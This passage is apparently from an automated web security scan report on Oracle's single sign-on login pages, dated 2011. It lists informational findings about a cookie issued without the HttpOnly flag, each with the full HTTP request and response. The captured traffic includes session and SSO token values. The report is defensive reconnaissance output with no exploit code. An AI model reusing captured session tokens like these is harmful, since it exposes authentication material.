OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:14:14 GMT
Content-Length: 1214
Content-Type: text/html; charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN">
<HTML>
<HEAD>
<TITLE>Error 404--Not Found</TITLE>
<META NAME="GENERATOR" CONTENT="WebLogic Server">
</HEAD>
<BODY bgcolor="white">
<FONT FACE=He
...[SNIP]...

13.87. https://login.oracle.com/mysso/signon.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/signon.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /mysso/signon.jsp HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~40F0BA36~0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010418767AFB7CACAE1E8A1D5BC67D978240D0CFE377F5A9ADE3F9C63F1468D714D8960345942853A8A315C8DEC76320F764A19C14D049E8440950AC3FCB19E8C4625DF9A3218AC7A9ED349F2636076CCFF871747F137DD74D5C63E78617CA86A85534A4BE22A035A1A5C4CE436DAA199E4D86DF00E9AC3337241384508207C772ECABF9255F75DBC84BE0AD6B9337EBE668883113A8DBFD3E00FEA9314357
Content-Length: 2822
Cache-Control: max-age=0
Origin: https://login.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

site2pstoretoken=v1.4%7E40F0BA36%7E0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Tue, 06 Sep 2011 16:14:14 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: 0
Set-Cookie: ORA_UCM_VER=; domain=.oracle.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Set-Cookie: ORA_UCM_SRVC=; domain=.oracle.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-ORACLE-DMS-ECID: 0000J8zXBRM6uHK6EVADUS1EHWFB01t_bQ
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/
Content-Length: 14934


<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html
...[SNIP]...

13.88. https://login.oracle.com/mysso/sso_loginui/b-bg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/b-bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/b-bg.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:17 GMT
Accept-Ranges: bytes
Content-Length: 51
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCB_6uHK6EVADUS1EHWFB01t_ck
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

GIF89a...................!.......,..............P.;

13.89. https://login.oracle.com/mysso/sso_loginui/b-l-corner.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/b-l-corner.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/b-l-corner.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:17 GMT
Accept-Ranges: bytes
Content-Length: 188
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCBj6uHK6EVADUS1EHWFB01t_cl
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

GIF89a.......................................................................................................!.......,..........9.4.dY.f:........@..=./\H....k.......$t..D.(....t;M...x...;

13.90. https://login.oracle.com/mysso/sso_loginui/b-r-corner.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/b-r-corner.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/b-r-corner.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:19 GMT
Accept-Ranges: bytes
Content-Length: 190
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCXF6uHK6EVADUS1EHWFB01t_dQ
